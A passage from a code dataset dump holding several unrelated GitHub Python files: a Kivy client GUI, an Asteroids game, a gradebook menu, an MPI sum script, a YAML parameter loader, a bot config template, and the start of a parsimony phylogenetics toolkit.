MyButton(Button):\n\tpass\n\n\nclass GUI(BoxLayout):\n\n\ttext_ipToConnect = ObjectProperty(None)\n\tlabel_Connected = ObjectProperty(None)\n\ttabbed_Panel = ObjectProperty(None)\n\tpanelHeader_Connect = ObjectProperty(None)\n\tpanelHeader_Tasks = ObjectProperty(None)\n\tpanelHeader_Results = ObjectProperty(None)\n\n\tdef __init__(self, **kwargs):\n\t\tsuper(GUI,self).__init__(**kwargs)\n\t\tLogger.info('GUI: Main GUI created')\n\n\t\tself.screenManager.transition = SlideTransition(direction=\"left\")\n\n\t\tself.listOfTask = self.taskToBeExecute\n\t\tself.controller = App.get_running_app()\n\n\n\tdef getAdapter(self):\n\t\ttask_args_converter = lambda row_index, rec: {\n\t\t\t'orientation': 'vertical',\n\t\t\t'text': rec['name'],\n\t\t\t'size_hint_y': None,\n\t\t\t'height': 
'150sp',\n\t\t\t'spacing': 0,\n\t\t\t'cls_dicts': [{'cls': ListItemButton,\n\t\t\t\t\t\t 'kwargs':{'text': rec['name'],\n\t\t\t\t\t\t \t\t\t 'is_representing_cls': True, 'size_hint_y': 0.2, 'markup': True, 'deselected_color':[1., 1., 0., 1], 'selected_color':[0., 1., 0., 1]}},\n\t\t\t\t\t\t\t{'cls': ListItemLabel,\n\t\t\t\t\t\t\t 'kwargs':{'text': rec['desc'], 'size_hint_y': 0.8, 'markup': True}} ]}\n\n\t\ttdata = App.get_running_app().model.getTasksListOfDict()\n\n\t\titem_strings = [\"{0}\".format(index) for index in range(len(tdata))]\n\n\t\ttasks_dict_adapter = DictAdapter(\n\t\t\tsorted_keys=item_strings,\n\t\t\tdata=tdata,\n\t\t\targs_converter = task_args_converter,\n\t\t\tselection_mode='multiple',\n\t\t\tcls=CompositeListItem)\n\n\t\treturn tasks_dict_adapter\n\t\t\n\n\tdef close(self):\n\t\tsys.exit(0)\n\t\t\n\n\tdef connect(self, ip):\n\t\tself.connectpopup = Popup(title='Connecting', size_hint=(None, None), height=60, width=350, auto_dismiss=True)\n\t\tLogger.info('SOCKET: Connecting to '+ip)\n\t\tself.controller.SERVERIP = ip\n\t\tself.connectpopup.open()\n\t\tself.controller.communication.connectToServer()\n\n\t\tself.screenManager.current = 'tasks_selection'\n\n\n\tdef switchToTab(self, name):\n\t\tif self.tabbed_Panel.current_tab.text != name:\n\t\t\tif name == \"Connect\":\n\t\t\t\tself.tabbed_Panel.switch_to(self.panelHeader_Connect)\n\t\t\telif name == \"Tasks\":\n\t\t\t\tself.listOfTask.adapter = self.getAdapter()\n\t\t\t\tself.tabbed_Panel.switch_to(self.panelHeader_Tasks)\n\t\t\telif name == \"Results\":\n\t\t\t\tself.tabbed_Panel.switch_to(self.panelHeader_Results)\n\t\t\telse:\n\t\t\t\tLogger.error('switchToTab: Invalid PanelHeader name received: '+name)\n\n\n\tdef executeTasks(self):\n\t\tif self.controller.STATE == \"IDLE\":\n\t\t\tselected_task_list = []\n\n\t\t\tfor i in self.listOfTask.adapter.selection:\n\t\t\t\tselected_task_list.append(i.text)\n\n\t\t\tif len(selected_task_list) != 0:\n\t\t\t\tself.controller.STATE = \"RUNNING\"\n\t\t\t\tself.controller.sendTasksToServer(selected_task_list)\n\t\t\t\tself.progressbar_ExecutingScreen.max = len(selected_task_list)\n\t\t\t\tself.screenManager.current = self.screenManager.next()\n\t\t\telse:\n\t\t\t\tp=NoTaskSelectedDialog()\n\t\t\t\tp.open()\n\n\n\tdef getResults(self):\n\t\ttemp_text=\"\"\n\n\t\tfor value in self.controller.getResults().itervalues():\n\t\t\ttemp_text+=(value['name']+\n'''\n-------------------------------------------\n\n\n**Result:**\n\n\n::\n\n'''+value['result']+\n'''\n\n''')\n\t\t\tif value['image'] != None:\n\t\t\t\ttemp_text+=(\n'''\n\n\n**System load during the task:**\n\n\n.. 
image:: '''+value['image']+'''\n\n''')\n\n\t\tself.rst_result.text= temp_text\n\n\t\tself.screenManager.current = 'tasks_selection'\n\t\tself.switchToTab(\"Results\")\n\n\n\n\tdef setConnectionStatus(self,connected):\n\t\tif connected:\n\t\t\tself.label_Connected.text = \"Status: [color=#00ff00][b]Connected[/b][/color]\"\n\t\telse:\n\t\t\tself.label_Connected.text = \"Status: [color=#ff0000][b]Disconnected[/b][/color]\"\n\n\n\tdef updateExecutionStatus(self, task):\n\t\tif task != None:\n\t\t\tself.textinput_Log.text = ''\n\t\t\ttemptext = \"[size=24][color=#36acd8][b]Current Task[b]: [/size][/color][size=18]\"+str(task.NAME)+\"[/size]\\n\"\n\t\t\ttemptext +=\"[size=24][color=#36acd8][b]Description[b]: [/size][/color][size=18]\\n\"+str(task.DESCRIPTION)+\"[/size]\"\n\t\t\tself.label_RunningTask.text = temptext\n\n\n\tdef updateProgressBar(self, percent):\n\t\tself.progressbar_ExecutingScreen.value=percent\n\n\n\tdef goBackButtonHandler(self):\n\t\tself.controller.STATE= \"IDLE\"\n\t\tself.switchToTab(\"Tasks\")\n\n\n\tdef sendToLog(self, message):\n\t\tself.textinput_Log.text += message+\"\\n\"\n\n\n","repo_name":"Spe3do/benchmark","sub_path":"src/client/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":5118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23029074475","text":"# implementation of Spaceship - program template for RiceRocks\n# http://www.codeskulptor.org/#user40_iCOPDwS7m5mL8M0.py\nimport simplegui\nimport math\nimport random\n\n# globals for user interface\nWIDTH = 800\nHEIGHT = 600\nscore = 0\nlives = 3\ntime = 0\nstarted = False\n\nclass ImageInfo:\n def __init__(self, center, size, radius = 0, lifespan = None, animated = False):\n self.center = center\n self.size = size\n self.radius = radius\n if lifespan:\n self.lifespan = lifespan\n else:\n self.lifespan = float('inf')\n self.animated = animated\n\n def get_center(self):\n return self.center\n\n def get_size(self):\n return self.size\n\n def get_radius(self):\n return self.radius\n\n def get_lifespan(self):\n return self.lifespan\n\n def get_animated(self):\n return self.animated\n\n \n# art assets created by Kim Lathrop, may be freely re-used in non-commercial projects, please credit Kim\n \n# debris images - debris1_brown.png, debris2_brown.png, debris3_brown.png, debris4_brown.png\n# debris1_blue.png, debris2_blue.png, debris3_blue.png, debris4_blue.png, debris_blend.png\ndebris_info = ImageInfo([320, 240], [640, 480])\ndebris_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/debris2_blue.png\")\n\n# nebula images - nebula_brown.png, nebula_blue.png\nnebula_info = ImageInfo([400, 300], [800, 600])\nnebula_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/nebula_blue.f2014.png\")\n\n# splash image\nsplash_info = ImageInfo([200, 150], [400, 300])\nsplash_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/splash.png\")\n\n# ship image\nship_info = ImageInfo([45, 45], [90, 90], 35)\nship_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/double_ship.png\")\n\n# missile image - shot1.png, shot2.png, shot3.png\nmissile_info = ImageInfo([5,5], [10, 10], 3, 50)\nmissile_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/shot2.png\")\n\n# asteroid images - asteroid_blue.png, asteroid_brown.png, 
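# [editorial note] The update() methods further below wrap positions toroidally with
# pos = (pos + vel) % WIDTH; Python's modulo keeps the result in [0, WIDTH) even for
# negative velocities, so sprites leaving one edge re-enter on the opposite side.
# Tiny illustration (not part of the original record):
assert (-5) % 800 == 795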
asteroid_blend.png\nasteroid_info = ImageInfo([45, 45], [90, 90], 40)\nasteroid_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/asteroid_blue.png\")\n\n# animated explosion - explosion_orange.png, explosion_blue.png, explosion_blue2.png, explosion_alpha.png\nexplosion_info = ImageInfo([64, 64], [128, 128], 17, 24, True)\nexplosion_image = simplegui.load_image(\"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/explosion_alpha.png\")\n\n# sound assets purchased from sounddogs.com, please do not redistribute\n# .ogg versions of sounds are also available, just replace .mp3 by .ogg\nsoundtrack = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/soundtrack.mp3\")\nmissile_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/missile.mp3\")\nmissile_sound.set_volume(.5)\nship_thrust_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/thrust.mp3\")\nexplosion_sound = simplegui.load_sound(\"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/explosion.mp3\")\n\n# helper functions to handle transformations\ndef angle_to_vector(ang):\n return [math.cos(ang), math.sin(ang)]\n\ndef dist(p, q):\n return math.sqrt((p[0] - q[0]) ** 2 + (p[1] - q[1]) ** 2)\n\n\n# Ship class\nclass Ship:\n\n def __init__(self, pos, vel, angle, image, info):\n self.pos = [pos[0], pos[1]]\n self.vel = [vel[0], vel[1]]\n self.thrust = False\n self.angle = angle\n self.angle_vel = 0\n self.image = image\n self.image_center = info.get_center()\n self.image_size = info.get_size()\n self.radius = info.get_radius()\n \n def draw(self,canvas):\n if self.thrust:\n canvas.draw_image(self.image, [self.image_center[0] + self.image_size[0], self.image_center[1]] , self.image_size,\n self.pos, self.image_size, self.angle)\n else:\n canvas.draw_image(self.image, self.image_center, self.image_size,\n self.pos, self.image_size, self.angle)\n # canvas.draw_circle(self.pos, self.radius, 1, \"White\", \"White\")\n\n def update(self):\n # update angle\n self.angle += self.angle_vel\n \n # update position\n self.pos[0] = (self.pos[0] + self.vel[0]) % WIDTH\n self.pos[1] = (self.pos[1] + self.vel[1]) % HEIGHT\n\n # update velocity\n if self.thrust:\n acc = angle_to_vector(self.angle)\n self.vel[0] += acc[0] * .1\n self.vel[1] += acc[1] * .1\n \n self.vel[0] *= .98\n self.vel[1] *= .98\n\n def set_thrust(self, on):\n self.thrust = on\n if on:\n ship_thrust_sound.rewind()\n ship_thrust_sound.play()\n else:\n ship_thrust_sound.pause()\n \n def increment_angle_vel(self):\n self.angle_vel += .06\n \n def decrement_angle_vel(self):\n self.angle_vel -= .06\n \n def shoot(self):\n global missile_group\n forward = angle_to_vector(self.angle)\n missile_pos = [self.pos[0] + self.radius * forward[0], self.pos[1] + self.radius * forward[1]]\n missile_vel = [self.vel[0] + 6 * forward[0], self.vel[1] + 6 * forward[1]]\n a_missile = Sprite(missile_pos, missile_vel, self.angle, 0, missile_image, missile_info, missile_sound)\n missile_group.add(a_missile)\n \n def get_radius(self):\n return self.radius\n \n def get_position(self):\n return self.pos\n \n \n# Sprite class\nclass Sprite:\n def __init__(self, pos, vel, ang, ang_vel, image, info, sound = None):\n self.pos = [pos[0],pos[1]]\n self.vel = [vel[0],vel[1]]\n self.angle = ang\n self.angle_vel = ang_vel\n self.image = image\n self.image_center = info.get_center()\n self.image_size = 
info.get_size()\n self.radius = info.get_radius()\n self.lifespan = info.get_lifespan()\n self.animated = info.get_animated()\n self.age = 0\n if sound:\n sound.rewind()\n sound.play()\n \n def draw(self, canvas):\n if self.animated:\n canvas.draw_image(self.image, [self.image_center[0] + self.age * self.image_size[0], self.image_center[1]], self.image_size,\n self.pos, self.image_size, self.angle)\n else:\n canvas.draw_image(self.image, self.image_center, self.image_size,\n self.pos, self.image_size, self.angle) \n\n def update(self):\n # update angle\n self.angle += self.angle_vel\n \n # update position\n self.pos[0] = (self.pos[0] + self.vel[0]) % WIDTH\n self.pos[1] = (self.pos[1] + self.vel[1]) % HEIGHT\n \n # check age\n self.age += 1\n if self.age < self.lifespan:\n return False\n return True\n \n def get_radius(self):\n return self.radius\n \n def get_position(self):\n return self.pos\n \n def collide(self, other_object):\n dist = math.pow((self.get_position()[0] - other_object.get_position()[0]), 2) + math.pow((self.get_position()[1] - other_object.get_position()[1]), 2)\n dist = math.pow(dist, 0.5)\n if self.get_radius() + other_object.get_radius() > dist:\n return True\n return False\n \n \n# key handlers to control ship \ndef keydown(key):\n if not started:\n return\n if key == simplegui.KEY_MAP['left']:\n my_ship.decrement_angle_vel()\n elif key == simplegui.KEY_MAP['right']:\n my_ship.increment_angle_vel()\n elif key == simplegui.KEY_MAP['up']:\n my_ship.set_thrust(True)\n elif key == simplegui.KEY_MAP['space']:\n my_ship.shoot()\n \ndef keyup(key):\n if not started:\n return\n if key == simplegui.KEY_MAP['left']:\n my_ship.increment_angle_vel()\n elif key == simplegui.KEY_MAP['right']:\n my_ship.decrement_angle_vel()\n elif key == simplegui.KEY_MAP['up']:\n my_ship.set_thrust(False)\n \n# mouseclick handlers that reset UI and conditions whether splash image is drawn\ndef click(pos):\n global started, score, lives\n center = [WIDTH / 2, HEIGHT / 2]\n size = splash_info.get_size()\n inwidth = (center[0] - size[0] / 2) < pos[0] < (center[0] + size[0] / 2)\n inheight = (center[1] - size[1] / 2) < pos[1] < (center[1] + size[1] / 2)\n if (not started) and inwidth and inheight:\n started = True\n lives = 3\n score = 0\n soundtrack.rewind()\n\ndef draw(canvas):\n global time, started, rock_group, lives, missile_group, score, my_ship\n \n # animate background\n time += 1\n wtime = (time / 4) % WIDTH\n center = debris_info.get_center()\n size = debris_info.get_size()\n canvas.draw_image(nebula_image, nebula_info.get_center(), nebula_info.get_size(), [WIDTH / 2, HEIGHT / 2], [WIDTH, HEIGHT])\n canvas.draw_image(debris_image, center, size, (wtime - WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))\n canvas.draw_image(debris_image, center, size, (wtime + WIDTH / 2, HEIGHT / 2), (WIDTH, HEIGHT))\n\n # draw UI\n canvas.draw_text(\"Lives\", [50, 50], 22, \"White\")\n canvas.draw_text(\"Score\", [680, 50], 22, \"White\")\n canvas.draw_text(str(lives), [50, 80], 22, \"White\")\n canvas.draw_text(str(score), [680, 80], 22, \"White\")\n\n # draw ship and sprites\n my_ship.draw(canvas)\n if started:\n process_sprite_group(canvas, rock_group)\n process_sprite_group(canvas, missile_group)\n process_sprite_group(canvas, explosion_group) \n soundtrack.play()\n \n # update ship and sprites\n my_ship.update()\n\n # draw splash screen if not started\n if not started:\n canvas.draw_image(splash_image, splash_info.get_center(), \n splash_info.get_size(), [WIDTH / 2, HEIGHT / 2], \n splash_info.get_size())\n \n # 
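# [editorial sketch] Sprite.collide() above assembles the Euclidean distance from two
# math.pow calls plus a manual square root. An equivalent, more idiomatic form
# (illustrative; not the module's own code):
import math

def collides(p, q, r1, r2):
    # math.hypot computes sqrt(dx*dx + dy*dy) directly
    return math.hypot(p[0] - q[0], p[1] - q[1]) < r1 + r2

assert collides((0, 0), (3, 4), 3, 3)      # distance 5 < 6
assert not collides((0, 0), (3, 4), 2, 2)  # distance 5 >= 4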
check for collision & decrease lives\n    if group_collide(rock_group, my_ship):\n        lives -= 1\n    \n    # check for missile and rocks collision and update score\n    score += group_group_collide(rock_group, missile_group)\n    \n    if lives <= 0:\n        started = False\n        soundtrack.pause()\n        my_ship = Ship([WIDTH / 2, HEIGHT / 2], [0, 0], 0, ship_image, ship_info)\n        my_ship.set_thrust(False)\n        for element in set(rock_group):\n            rock_group.remove(element)\n        for element in set(explosion_group):\n            explosion_group.remove(element)\n        for element in set(missile_group):\n            missile_group.remove(element)\n    \n    \n# method to draw rocks and missiles in a set\ndef process_sprite_group(canvas, group):\n    for element in set(group):\n        element.draw(canvas)\n        if element.update():\n            group.discard(element)\n\n# group collide detection\ndef group_collide(group, other_object):\n    global explosion_group\n    for element in set(group):\n        if element.collide(other_object):\n            explosion_pos = element.get_position()\n            explosion_vel = [0, 0]\n            explosion_avel = 0\n            explosion = Sprite(explosion_pos, explosion_vel, 0, explosion_avel, explosion_image, explosion_info)\n            explosion_group.add(explosion)\n            explosion_sound.play()\n            group.remove(element)\n            return True\n    return False\n\n# collision between missiles and rocks\ndef group_group_collide(group, other_group):\n    count = 0\n    for element in set(group):\n        if group_collide(other_group, element):\n            group.discard(element)\n            count += 1\n    return count\n    \n# timer handler that spawns a rock \ndef rock_spawner():\n    global rock_group, started, my_ship, score\n    rock_pos = [random.randrange(0, WIDTH), random.randrange(0, HEIGHT)]\n    rock_vel = [random.random() * .6 - .3 + score / 40, random.random() * .6 - .3 + score / 40]\n    rock_avel = random.random() * .2 - .1\n    a_rock = Sprite(rock_pos, rock_vel, 0, rock_avel, asteroid_image, asteroid_info) \n    # use the rock's own y-coordinate so new rocks keep a safe distance from the ship\n    dist = math.pow((a_rock.get_position()[0] - my_ship.get_position()[0]), 2) + math.pow((a_rock.get_position()[1] - my_ship.get_position()[1]), 2)\n    dist = math.pow(dist, 0.5)\n    if len(rock_group) < 13 and started and dist > 70:\n        rock_group.add(a_rock)\n    \n# initialize stuff\nframe = simplegui.create_frame(\"Asteroids\", WIDTH, HEIGHT)\n\n# initialize ship and two sprites\nmy_ship = Ship([WIDTH / 2, HEIGHT / 2], [0, 0], 0, ship_image, ship_info)\nrock_group = set()\nmissile_group = set()\nexplosion_group = set()\n\n\n# register handlers\nframe.set_keyup_handler(keyup)\nframe.set_keydown_handler(keydown)\nframe.set_mouseclick_handler(click)\nframe.set_draw_handler(draw)\n\ntimer = simplegui.create_timer(1000.0, rock_spawner)\n\n# get things rolling\ntimer.start()\nframe.start()\n","repo_name":"rajeshsurana/PythonPortfolio","sub_path":"Asteroids/asteroids.py","file_name":"asteroids.py","file_ext":"py","file_size_in_byte":13155,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"27"}
+{"seq_id":"31456126347","text":"class MenuClass:\n    def menu(self,language,choose=None):\n        from discipleClass import DiscipleClass\n        from menuClass import MenuClass\n        if (language == 'PL'):\n            print('Czesc, zalogowales sie do dziennika. Wybierz opcje, poprzez wpisanie jej numeru:')\n            print('0. Wybierz i wyswietl ucznia, z obliczona srednia ocen(statystyki).')\n            print('1. Dodanie ucznia.')\n            print('2. Edycja ucznia.')\n            print('3. Usuniecie ucznia.')\n            print('4. Importuj baze danych z pliku csv')\n            print('5. Eksportuj baze danych do pliku csv')\n            print('6. Wyloguj sie.')\n            print('7. 
Zrob kopie bazy danych z pliku csv(dataCopy.csv).')\n if (choose == None):\n choose = str(input())\n if (choose == \"0\"):\n DiscipleClass().chooseAndDisplayDisciple(language)\n elif (choose == \"1\"):\n DiscipleClass().addDisciple(language)\n elif (choose == \"2\"):\n DiscipleClass().editDisciple(language)\n elif (choose == \"3\"):\n DiscipleClass().removeDisciple(language)\n elif (choose == \"4\"):\n MenuClass().importDatabaseFromCSV(language)\n elif (choose == \"5\"):\n MenuClass().exportDatabaseToCSV(language)\n elif (choose == \"6\"):\n MenuClass().logOut(language)\n elif (choose == \"7\"):\n MenuClass().copyDatabaseToCSV(language)\n else:\n print('You had a typo. Try again!')\n return MenuClass().menu(language)\n elif (language == 'EN'):\n print('Hello, you logged in electronic dictionary. Choose option, by typing in it\\'s number:')\n print('0. Choose and show disciple, with mark averages(statistics)')\n print('1. Add disciple')\n print('2. Edit disciple')\n print('3. Delete disciple')\n print('4. Import database from csv file')\n print('5. Export database to csv file')\n print('6. Log Out')\n print('7. Make a copy of database(dataCopy.csv).')\n if(choose==None):\n choose = str(input())\n if (choose == \"0\"):\n DiscipleClass().chooseAndDisplayDisciple(language)\n elif (choose == \"1\"):\n DiscipleClass().addDisciple(language)\n elif (choose == \"2\"):\n DiscipleClass().editDisciple(language)\n elif (choose == \"3\"):\n DiscipleClass().removeDisciple(language)\n elif (choose == \"4\"):\n MenuClass().importDatabaseFromCSV(language)\n elif (choose == \"5\"):\n MenuClass().exportDatabaseToCSV(language)\n elif (choose == \"6\"):\n MenuClass().logOut(language)\n elif (choose == \"7\"):\n MenuClass().copyDatabaseToCSV(language)\n else:\n print('You had a typo. 
Try again!')\n                return MenuClass().menu(language)\n\n    def chooseLanguage(self,choose=None):\n        if (choose == None):\n            print('To choose english language, type in: EN')\n            print('Zeby wybrac polski jezyk, wpisz: PL')\n            choose = str(input())\n        if(choose!=\"EN\" and choose!=\"PL\"):\n            raise Exception(\"Wrong language inputted.\")\n        return choose\n    def exportDatabaseToCSV(self,language):\n        from menuClass import MenuClass\n        import json\n        try:\n            with open('../data/data.txt') as json_file:\n                data = json.load(json_file)\n            with open('../data/data.csv', 'w') as outfile:\n                json.dump(data, outfile)\n        except:\n            pass\n        return MenuClass().menu(language)\n    def copyDatabaseToCSV(self,language):\n        from menuClass import MenuClass\n        import json\n        try:\n            with open('../data/data.csv') as json_file:\n                data = json.load(json_file)\n            with open('../data/dataCopy.csv', 'w') as outfile:\n                json.dump(data, outfile)\n        except:\n            pass\n        return MenuClass().menu(language)\n    def importDatabaseFromCSV(self,language):\n        from menuClass import MenuClass\n        import json\n        try:\n            with open('../data/data.csv') as json_file:\n                data = json.load(json_file)\n            with open('../data/data.txt', 'w') as outfile:\n                json.dump(data, outfile)\n        except:\n            pass\n        # pass only the language; self was mistakenly forwarded as the language argument\n        return MenuClass().menu(language)\n    def logOut(self,language):\n        if(language==\"PL\"):\n            print(\"Wylogowales sie!\")\n        if(language==\"EN\"):\n            print(\"You have logged out!\")\n        return 0\n#import doctest\n#doctest.testmod(extraglobs={'c': MenuClass()})","repo_name":"TestowanieAutomatyczneUG/projekt-i-Darkstaron123","sub_path":"src/menuClass.py","file_name":"menuClass.py","file_ext":"py","file_size_in_byte":4851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"35379636604","text":"#!/usr/bin/env python\nfrom mpi4py import MPI\n\ncomm = MPI.COMM_WORLD\nworld_size = comm.Get_size()\nworld_rank = comm.Get_rank()\n\n# every non-root rank sends its rank number to rank 0,\n# which receives one value per sender and accumulates the total\nif world_rank == 0:\n    global_sum = world_rank\n    for source in range(1, world_size):\n        received_value = comm.recv(source=source, tag=0)\n        global_sum = global_sum + received_value\n    print(global_sum)\nelse:\n    comm.send(world_rank, dest=0, tag=0)\n","repo_name":"otmanesabir/JUB-S4-S5","sub_path":"S5/Parallel & Distributed Computing/Lecture1:MPI/global_sum.py","file_name":"global_sum.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"}
+{"seq_id":"31106740895","text":"import sys\nfrom typing import Type, TypeVar\nimport yaml\nfrom paramsparser.paramsbase import ParamsBase\n\nT = TypeVar('T')\n\nclass Yaml2Params(ParamsBase):\n    def __init__(self, filename:str='params.yml', filestream=None, safe_load=True, params:dict=None) -> None:\n        if params is None:\n            params = Yaml2Params.load_document(filename, filestream, safe_load, False)\n        super().__init__(params)\n        self._configs.filename = filename\n\n    def save(self, new_filename=None, overwrite=True):\n        super().save(new_filename, yaml.dump(dict(self)), overwrite)\n\n    add_representer = yaml.add_representer\n    add_constructor = yaml.add_constructor\n    @staticmethod\n    def register_class(class_name: Type[T], ytag: str) -> None:\n        suffix = '%s.%s' % (class_name.__module__, class_name.__name__)\n        Yaml2Params.add_representer(class_name, lambda dumper, 
obj: dumper.represent_mapping(ytag, obj.__dict__))\n Yaml2Params.add_constructor(ytag, lambda loader, node: loader.construct_python_object(suffix, node))\n\n @staticmethod\n def load_all_documents(filename:str='params.yml', filestream=None, safe_load=True):\n return [Yaml2Params(params=d) for d in Yaml2Params.load_document(filename, filestream, safe_load, True)]\n\n @staticmethod\n def load_document(filename, filestream=None, safe_load=True, load_multiple=False):\n try:\n load_type = 'load'\n if load_multiple:\n load_type += '_all'\n load_function = getattr(yaml, 'safe_' + load_type) if safe_load else getattr(yaml, load_type)\n if filestream is not None:\n data = load_function(filestream)\n else:\n with open(filename, 'r', encoding='utf-8') as filestream:\n data = load_function(filestream)\n for d in (data if load_multiple else [data]):\n if not isinstance(d, dict):\n raise TypeError(f'TypeError: key is missing in {d}')\n return data\n except TypeError as e:\n print('Exception occurred while parsing YAML...', file=sys.stderr)\n print(e, file=sys.stderr)\n sys.exit(1)\n except Exception as e:\n print('Exception occurred while loading YAML...', file=sys.stderr)\n print(e, file=sys.stderr)\n sys.exit(1)\n\n","repo_name":"pysan3/paramsparser","sub_path":"paramsparser/yaml2params.py","file_name":"yaml2params.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31986298344","text":"import numpy as np\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import OneHotEncoder\nimport resize_images\n\ndef convert_arrays(data, labels):\n values = np.array(labels)\n label_encoder = LabelEncoder()\n integer_encoded = label_encoder.fit_transform(values)\n del_these = np.where(integer_encoded == 0)\n integer_encoded = np.delete(integer_encoded, del_these)\n data = np.delete(data, del_these)\n data = resize_images.resize_array(data)\n onehot_encoder = OneHotEncoder(sparse=False)\n integer_encoded = integer_encoded.reshape(len(integer_encoded), 1)\n labels = onehot_encoder.fit_transform(integer_encoded)\n # reshape X data\n data = data.transpose().reshape(-1, 50 * 50)\n data = data.transpose().reshape(-1, 50 * 50)\n data = np.true_divide(data, 255)\n return data, labels\n","repo_name":"alexfaus08/Recognizing-Scrabble-Letters","sub_path":"convert_arrays.py","file_name":"convert_arrays.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30745686490","text":"from typing import List\n\n# Alternative ways of sending required arguments to the application if env variables is not an option for your\n# deployment\n\nDISCORD_TOKEN = None\n\n# Required config parameters to replace\n\n# -- Gameplay balancing related\nUNCOMMON_UPGRADE_RATE: float = None\nDEFAULT_BASIC_BOOSTER_COOLDOWN: int = None\nDEFAULT_PROMO_BOOSTER_COOLDOWN: int = None\nDEFAULT_GRADING_COOLDOWN: int = None\nDAILY_MONEY_GIFT_AMOUNT: int = None\nBOOSTERS_PRICE: dict[str, int] = {\n \"Basic\": None,\n \"Promo\": None\n}\nGRADING_PRICE: int = None\nFAV_GALLERY_PAGES: int = None\n\n# -- Discord related\nLOG_CHANNEL_ID: int = None\nBOT_ADMIN_USER_IDS: List[int] = []\n\n# -- Database related\nDATABASE_MODE_ENABLED: bool = False\nHOSTNAME: str = None\nDB_NAME: str = None\nUSERNAME: str = None\nPASSWORD: str = None\nPORT_ID: int= None\nCONNECTION_POOL_MIN_CONNECTIONS: int = 0\nCONNECTION_POOL_MAX_CONNECTIONS: int = 
5\n","repo_name":"Grimmys/PokeTCGBot","sub_path":"config_sample.py","file_name":"config_sample.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"40932998857","text":"''' Toolkit for performance of Parsimonious Criterion (Parsimony) methods of\noptimization of a phylogenetic topology with a particular set of data. '''\n\n# Date: Mar 3 2014\n# Author: Alex Safatli\n# E-mail: safatli@cs.dal.ca\n\nfrom base import treeStructure\npostorder = treeStructure.postOrderTraversal\n\nclass profile_set:\n \n ''' Hold a set of site_profile profiles for an \n entire alignment. '''\n\n def __init__(self,alignment):\n \n ''' Initialize this profile set by indicating an alignment. \n \n :param alignment: an alignment object\n :type alignment: an :class:`.alignment.alignment` object\n \n '''\n \n self.alignment = alignment\n self.numSites = alignment.getSize()\n self.taxa = {}\n self.profiles = []\n self.weights = []\n self.sites = []\n self._constructSet()\n self._buildTaxaDict()\n \n def _constructSet(self):\n \n ''' PRIVATE: Build all site_profiles. '''\n \n num = self.numSites\n for site in xrange(num):\n pro = site_profile(self.alignment,site)\n self.sites.append(pro)\n if pro in self.profiles:\n self.weights[self.profiles.index(pro)] += 1\n else:\n self.profiles.append(pro)\n self.weights.append(1)\n \n def _buildTaxaDict(self):\n \n ''' PRIVATE: Build taxa dictionary. '''\n \n tax = self.alignment.getTaxa()\n for t in xrange(len(tax)): self.taxa[tax[t]] = t\n \n def __len__(self):\n \n return len(self.profiles)\n \n def weight(self,val):\n \n ''' Acquire the weight associated with an index. \n \n :param val: an index of the set\n :type val: an integer\n :return: a weight (integer)\n \n '''\n \n return self.weights[val]\n \n def get(self,val):\n \n ''' Acquire the site profile at an index. \n \n :param val: an index of the set\n :type val: an integer\n :return: a :class:`.site_profile` object\n \n '''\n \n return self.profiles[val]\n \n def getForTaxa(self,val,tax):\n \n ''' Acquire the string of sequence alphabet characters for a taxon. \n \n :param val: an index of the set\n :type val: an integer\n :param tax: a taxon name\n :type tax: a string\n :return: a string of characters\n \n '''\n \n return self.profiles[val].vector[self.taxa[tax]]\n\nclass site_profile:\n \n ''' Consolidate a single column of the alignment into a set of components\n with associated counts. '''\n \n def __init__(self,alignment,site):\n \n ''' Initialize this profile. \n \n :param alignment: an alignment object\n :type alignment: an `.alignment.alignment` object\n :param site: a site/column index along the alignment\n :type site: an integer\n \n '''\n \n self.alignment = alignment\n self.site = site\n self.alphabet = None\n self.vector = ''\n self._buildVector()\n \n def __eq__(self,o):\n \n if (o == None): return False\n return (self.vector == o.vector)\n \n def __ne__(self,o):\n \n return not self.__eq__(o)\n \n def __str__(self):\n \n return self.vector\n \n def _buildVector(self):\n \n ''' Build the vector comprising the set of components. '''\n \n aliData = self.alignment.data\n sitesli = aliData.sequenceSlice(self.site)\n compn = 0\n comps = {}\n for it in sitesli:\n if not it in comps:\n comps[it] = compn\n compn += 1\n self.vector += str(comps[it])\n self.alphabet = comps\n\ndef fitch_cost(topology,profiles):\n \n ''' Calculate the cost using Fitch algorithm on \n profile set and alignment. 
